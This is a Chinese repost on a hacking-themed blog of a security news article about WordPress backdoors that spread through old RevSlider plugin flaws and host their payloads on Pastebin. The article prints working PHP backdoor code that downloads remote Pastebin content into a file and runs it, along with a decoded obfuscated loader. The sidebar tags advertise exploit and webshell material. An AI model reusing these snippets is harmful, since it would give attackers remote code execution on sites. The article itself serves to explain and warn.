WEBSHELL

今天是

关于我联系我网站地图

现在位置:首页 » 关注cms » 隐匿在Pastebin上的后门

隐匿在Pastebin上的后门
作者:T.H.E   分类:关注cms   评论(0)   浏览(1661)   关键词: 隐匿在Pastebin上的后门

1.png

快速分享文本、代码的网站Pastebin常常被黑客们用来分享自己的库、窃取的数据和其他代码,而现在它真的被用于黑客攻击了。

近日安全研究人员居然发现黑客们正在通过Gmail草稿、Evernote等平台控制僵尸网络。安全公司Sucuri最近发布的博文介绍了一种新玩法:黑客利用流行的WordPress插件RevSlider的老版本漏洞传播新的后门变种,使用Pastebin.com放置恶意软件。下面就让我们一起来看看黑客们的新创意吧。

2.png

Sucuri公司近日发表了一篇博客,该博客详细解释了黑客是如何利用旧版本的RevSlider WordPress插件来传播一种新型后门,而该后门利用Pastebin.com网站服务来托管恶意代码文件。

恶意软件高级研究员Denis Sinegubko在博客中写道: 


“这或多或少可以算得上是一个典型的后门。它从远程服务器下载恶意代码,并在受害网站上将这些恶意代码保存到一个文件中,使其随时可被执行。不过,比较有趣的一点是其远程服务器的选择,黑客既没将恶意代码文件托管在自己的网站,也不是肉鸡网站,而是在最受欢迎的Web应用网站Pastebin.com上。”

攻击者通过扫描目标网站来寻找含有漏洞的RevSlider插件。一旦发现,他们会利用RevSlider的另一个漏洞将后门代码上传到该网站。


if(array_keys($_GET)[0] == 'up'){
$content = file_get_contents("http://pastebin.com/raw.php?i=JK5r7NyS");
if($content){unlink('evex.php');
$fh2 = fopen("evex.php",'a');
fwrite($fh2,$content);
fclose($fh2);
}}else{print "test";}

关键后门代码

这是一份稍微复杂点的后门样本,是通过RevSlider漏洞上传的:

3.png

从截图中你可以看到这段代码将一段经过Base64编码的内容注入WordPress核心文件wp-links-opml.php中的$temp变量。以下是经过解密的$temp内容:

4.png

 

你可以看到它从Pastebin下载代码并立即执行。但这次只有当攻击者提供wp_nonce_once中的请求参数,也就是Pastebin的文章ID时才会运行。wp_nonce_once参数的使用使得管理员难以追踪恶意代码的具体地址(防止了网址被屏蔽),同时又增加了后门的灵活性———这样它就能够下载执行任何Pastebin上的代码——哪怕是那些一开始不存在的代码————只需要向wp-links-opml.php提供ID就行了。

FathurFreakz编码器

印度尼西亚黑客们有一款编码器与Pastebin配合默契。名字叫做PHP Encryptor by Yogyakarta Black Hat 或者是 by FathurFreakz。在 Pastebin.com网站上粘帖创建PHP代码,软件就会加密那个Pastebin网址,生成混淆后的代码:

5.png

解密后:
function FathurFreakz($ct3){
xcurl('http://pastebin.com/download.php?i='.code($ct3));
}
FathurFreakz(CODE);

这段代码会下载执行Pastebin上的代码(使用xcurl函数),ID在CODE常量中,并且经过加密。你可以看到另外一种Pastebin网址种类:download.php,基本上它跟raw.php一样,但它提供HTTP头,使得浏览器不会显示内容,而是直接以文件形式下载。
经过解密的代码(看起来他们超爱用Pastebin……):

6.png

给站长们敲响警钟

黑客在实时攻击的时候大规模利用Pastebin网站,这给网站管理员敲响了警钟,提示他们要时刻维护网站的CMS(内容管理系统)以防止插件被恶意利用。

就在几周前,一款新型针对WordPress的恶意软件SoakSoak,其主要攻击手段也是通过RevSlider的漏洞,上传一个后门,然后对所有使用相同服务器的网站进行感染。当时SoakSoak攻陷了约10万个WordPress站。


本文来源于:http://www.freebuf.com/


    转载分享请注明原文地址(WEBSHELL):https://www.webshell.ren/post-230.html
分享本文至:

发表评论:

标签

  • 过狗总结
  • 免费资源
  • cms漏洞
  • 纯属扯淡
  • 渗透工具
  • 系统漏洞
  • 编辑器漏洞
  • 渗透教程
  • 提权exp分享
  • 站长资讯
  • 提权教程
  • 旁站工具
  • 一句话脚本
  • iis6写权限和遍历修复
  • 启动项目提权
  • 本人消失一段时间
  • asp大马后门
  • 搜狗问问存储型XSS
  • 批量discuz
  • 最新过狗菜刀
  • 7.2
  • 免杀pr
  • php读取iis配置脚本
  • 过安全宝
  • phpweb拿shell突破安全狗
  • Drupal
  • 实战某学校内网渗透
  • 7.31爆严重SQL注入漏洞【附exp】
  • 星外提权
  • windows
  • boot
  • manager
  • .htaccess
  • 301重定向
  • 免杀提权exp整理
  • 分享字典
  • 内网端口转发
  • 编辑器插一句话
  • wdcp虚拟主机管理系统
  • 过狗大马
  • CVE-2014-6332
  • 免费cdn加速
  • 附上exp
  • windows创建隐藏帐号
  • 指定渗透某大学
  • XYCMS漏洞整理
  • 内网渗透
  • emlog相册插件漏洞
  • 校园系统cms漏洞
  • Alan社工教程
  • 说明
  • pigcms&iwxcms漏洞利用工具
  • 批量上传黑页
  • IISPutScanner增强版
  • cc攻击防御
  • 椰树V1.9接口修复版
  • CVE-2014-3153
  • EXP
  • 搜索引擎分别CDN加速
  • MSSQL数据库提权
  • 新C段查询工具
  • 利用Apache解析漏洞拿下单子站
  • 内网渗透系列教程整理(原创)
  • 第一章节:讲解内网转发(原创)
  • sqlmap基本使用方法
  • 实战社工系列教程
  • cms漏洞集合
  • DDoS攻击
  • 12306信息泄密事件
  • 第二章节:内网域渗透(原创)
  • DDOS工具
  • wordpress上传漏洞
  • 支付宝自动转账支付代码
  • 突破SecureRDP拦截
  • 内网渗透第三章节1小节(原创)
  • 知名安全检测工具AWVSv9.5更新破解版本
  • 内网渗透第三章节0x2小节
  • 8.1权限提升漏洞POC
  • 渗透系列视频教程
  • 木马爆破工具集合
  • 记一次上传拿shell
  • 最新提星外主机系统思路(原创)
  • 过守护神总结
  • 对母校官方网站的一次渗透检测经历
  • 帝国CMS
  • 74CMS
  • 社会工程学系列
  • 文字语音调用代码
  • 法克论坛旁站查询工具
  • 数据泄露那些事情
  • Bitstamp
  • 翻墙网站
  • 黑掉ATM
  • aspcmsCSRF漏洞利用代码
  • 绕过各种CDN防护总结
  • 轻量级网站漏洞批量扫描器
  • 隐匿在Pastebin上的后门
  • 学校渗透系列一
  • ISIS黑客
  • SniffPass
  • -
  • 网络密码嗅探
  • 黑客组织“匿名者”
  • 谷歌把微软惹毛了
  • iPod
  • nano竟成ATM盗窃工具
  • 恶意软件可绕过密码
  • 马化腾QQ也曾被盗
  • 铁通被曝系统漏洞
  • Windows8.1漏洞
  • 白帽子借漏洞1元买几十万Model
  • Notepad++官网被圣战组织黑了
  • 苹果OSX的Spotlight文件搜索含泄漏用户隐私漏洞
  • 2014十大木马
  • 免费cdn加速整理
  • 韩国航空Facebook
  • Discuz!
  • X1.5前台getshell漏洞
  • 斯诺登又曝新料
  • 《英雄联盟》被曝植入木马
  • 2014年全球十大网络攻击事件
  • PolarSSL
  • 劫持301重定向快照流量
  • 过D盾的思路
  • 指定网站入侵
  • 比特币
  • 安全漏洞资讯
  • 黑客攻击
  • 自动批量SHELL一条龙
  • 域名爆破+Host查询
  • 黑客组织Anonymous
  • Burp
  • Suite
  • WordPress网站漏洞
  • 河马工具
  • kali系列教程
  • 网络资讯
  • MS15-077
  • MS15-051
  • 黑客交易吧2003渗透系统
  • 对国外黑客批量爆菊花
  • joomla反序列化漏洞
  • Dedecms延时注入漏洞
  • https
  • 安全狗
  • Nmap使用教程
  • linux
  • 工具收集
  • 腾讯安全网址拦截
  • 菜刀后门解析
    • 全球访问统计

        Free counters!
    • <-----------------------------------------------分界线----------------------------------------------->